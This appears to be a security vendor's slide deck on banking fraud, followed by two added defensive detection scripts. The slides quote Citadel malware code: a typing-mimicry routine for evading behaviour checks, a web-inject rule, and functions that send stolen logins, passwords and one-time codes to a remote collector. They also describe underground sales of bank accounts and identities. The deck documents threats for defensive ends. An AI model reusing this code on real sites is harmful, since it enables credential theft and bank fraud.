Online Fraud: Threats & Trends
Ziv Cohen
Director, EMEA Sales
Trusteer Confidential 2012 ©
Criminals Attack the Weak Link With Malware
[Diagram: Cyber Criminals, Customer Accounts and Retail/Business Customer, with attack paths labelled Difficult, Easy, Easy]
Trusteer Confidential 2013 ©
Protect Your Investment
Two emerging trends for malware:
• Back-to-basics tactics: reviving old techniques to bypass security solutions
• Malware security: investing in protecting malware from:
  - Malware detection systems
  - Anomaly detection systems
  - Behavior profiling systems
  - Device ID solutions
  - And more…
Cybercrime forum trends: more services that help outsource technical aspects of fraud
Evading Detection (Wrapper)
Evading Detection
Undetectable to AVs
Undetectable to AVs
Bypassing Device ID (RDP)
Notification
Login
Injection
Bypassing Device ID (RDP)
RDP
Transaction
Bypassing Device ID
Behavior Anomaly Evasion

    slow_fill = function(id, text) {
        var i = 1;
        beepInput(id);
        // Writes the text into the field one character at a time, every 200 ms
        var thread = setInterval(function() {
            id.value = text.substr(0, i);
            i++;
            if (i == text.length + 1) {
                clearInterval(thread);
                deleteHelpMessage();
            }
        }, 200);
    }

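
A defender-side check for the fill pattern in slow_fill above, as an added example that is not from the presentation: the code shown assigns the field value on a fixed 200 ms timer, so a near-constant cadence and value growth without trusted keystrokes are both signals. The function name, thresholds and sample timings are assumptions constructed for illustration.

```javascript
// Added example (not from the slides). Thresholds are illustrative assumptions.
const MIN_CHANGES = 5;   // need several intervals before judging cadence
const MAX_CV = 0.1;      // flag when timing varies by less than 10% of the mean

// changes: timestamps (ms) at which the field value grew by one character,
//          e.g. collected by polling field.value, because assigning .value
//          from script does not fire an "input" event.
// trustedKeys: count of keydown events with event.isTrusted === true on the field.
function assessFill(changes, trustedKeys) {
  const reasons = [];
  if (changes.length > 0 && trustedKeys === 0) {
    reasons.push('value-changed-without-keystrokes');
  }
  if (changes.length >= MIN_CHANGES) {
    const gaps = changes.slice(1).map((t, i) => t - changes[i]);
    const mean = gaps.reduce((a, b) => a + b, 0) / gaps.length;
    const variance = gaps.reduce((a, g) => a + (g - mean) ** 2, 0) / gaps.length;
    // Coefficient of variation: near 0 for a timer, much larger for a person.
    const cv = mean > 0 ? Math.sqrt(variance) / mean : 0;
    if (cv < MAX_CV) reasons.push('uniform-typing-cadence');
  }
  return { suspicious: reasons.length > 0, reasons };
}

// Constructed samples: a 200 ms timer with slight jitter, and uneven human typing.
const timerFill = [0, 200, 401, 600, 799, 1000, 1201];
const humanFill = [0, 130, 410, 520, 900, 1010, 1450];

console.log(assessFill(timerFill, 0));
console.log(assessFill(humanFill, 7));
```

Treat the result as one signal to report to the server alongside others, since code running in an infected browser can be tampered with.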
Russian Banks Targeted by Malware
The attacker:
Citadel – a descendant of Zeus
MITB functionality
The targets:
VTB24 (/WebNew/login.aspx)
Russian Standard Bank (rsb.ru)
Avangard Bank (avangard.ru)
The method:
Steal credentials
Steal OTPs
HTML Injection
Real time victim-to-cybercriminal communications
Example of attack flow
Capture credentials in real time
The malware checks the credentials' validity
Communicate with the user
Credentials are sent to the C&C in real time via Jabber
Cybercriminal logs in using the credentials, after pausing the victim

    <WebInject>
      <Before><![CDATA[<input name="TextBoxPassword" type="password" size="6" id="TextBoxPassword" class="text"]]></Before>
      <After><![CDATA[]]></After>
      <Data><![CDATA[ onkeypress="if(event.keyCode == 13) return false;"]]></Data>
    </WebInject>

    function Check() {
        if (login.value.length > 3 && pass.value.length > 3) {
            write_c('login', login.value, 3);
            write_c('pass', pass.value, 3);
            check_block();
        }
    }

Пожалуйста , ожидайте . Происходит Авторизация! ("Please wait. Authorization in progress!")

    function KnockToAdmin() {
        var link = log_link + "?log=" + read_c('login') + "&pass=" + read_c('pass') + "&tan=" + tan.value;
        GetDataACD_knock_to_admin(link);
    }
    function SendMsg(msg) {
        var link = jabb_link + '?log=' + msg;
        GetDataACD_sendmsg(link);
    }

    function WaitForBlock() {
        var link = admin_logs + read_c('login') + '/block.me';
        GetDataACD_WaitForBlock(link);
    }
    function WaitForNextCode() {
        var link = admin_logs + read_c('login') + '/kod.2';
        GetDataACD_WaitForNextCode(link);
    }
    function WaitForFreeUse() {
        var link = admin_logs + read_c('login') + '/free.use';
        GetDataACD_WaitForFreeUse(link);
    }
    function OnLoadACD_check_block() {

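
The WebInject rule above adds an `onkeypress` attribute to the password field, so one integrity check is to compare the attributes the browser ends up with against the markup the server actually sent. The following is an added example, not code from the presentation; the function names are hypothetical and the closing `>` of the served tag is assumed, since the rule quotes only the start of the tag.

```javascript
// Added example, not from the slides. In a browser the observed attributes
// would come from element.attributes; strings are used here so it runs in Node.

// Parse the attributes of one start tag into a Map (lower-cased name -> value).
function parseAttrs(tag) {
  const attrs = new Map();
  const body = tag.replace(/^<\s*[\w-]+/, '').replace(/\/?>\s*$/, '');
  const re = /([^\s"'<>\/=]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'=<>`]+)))?/g;
  let m;
  while ((m = re.exec(body)) !== null) {
    attrs.set(m[1].toLowerCase(), m[2] ?? m[3] ?? m[4] ?? '');
  }
  return attrs;
}

// Report attributes in the rendered tag that differ from what the server sent.
function diffAttrs(servedTag, observedTag) {
  const served = parseAttrs(servedTag);
  const findings = [];
  for (const [name, value] of parseAttrs(observedTag)) {
    if (!served.has(name)) {
      // Event-handler attributes (on*) that appear from nowhere are the strongest signal.
      findings.push({ name, kind: name.startsWith('on') ? 'added-handler' : 'added' });
    } else if (served.get(name) !== value) {
      findings.push({ name, kind: 'changed' });
    }
  }
  return findings;
}

// Field markup as quoted in the rule's <Before>; the closing ">" is assumed.
const served = '<input name="TextBoxPassword" type="password" size="6" ' +
               'id="TextBoxPassword" class="text">';
// The same tag with the rule's <Data> attribute present, as the browser would see it.
const observed = served.slice(0, -1) +
                 ' onkeypress="if(event.keyCode == 13) return false;">';

console.log(diffAttrs(served, observed));
```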
Fraud as a Service: An Identity is Born
Fraud as a Service: Create A New Account
Selling bank account packages:
• Bank account information + ATM card
• Online banking credentials
• Official documents (including passports)
• Price: 12,000 Ruble (~$360)
Also offering a cashout service for a 5% fee
Fraud as a Service
"Will buy a Corporate identity in one of the following countries"
A corporate identity is an identity, online or real, which is authorized to perform changes and transfers in a corporate bank account.
I'm interested in credentials. Can be mixed countries, with United Arab Emirates, also interested in Poland, Italy, Netherlands
Too Lazy?
Security Silos FAIL!
Holistic Approach for Cybercrime
WWW
Phishing and Malware Fraud
Advanced Threats (Employees)
Online/Mobile Banking
Money, Intellectual Property, Business Data
Account Takeover, New Account Fraud
Mobile Fraud Risk
Trusteer Cybercrime Prevention Architecture
Compact software agent that prevents malware and Phishing attacks
Endpoint solutions for detecting malware, jailbreak, and other mobile risk factors
Out-of-Band Authentication
100% accurate clientless detection of active MitB malware on users’ devices
Conclusive criminal access detection by correlating device fingerprint and account compromise history
Trusteer Rapport PC/Mac
Trusteer Mobile iOS, Android
Trusteer Pinpoint Malware Detection
Trusteer Pinpoint ATO Detection
Centralized Management, Alerting, Reporting
Thank You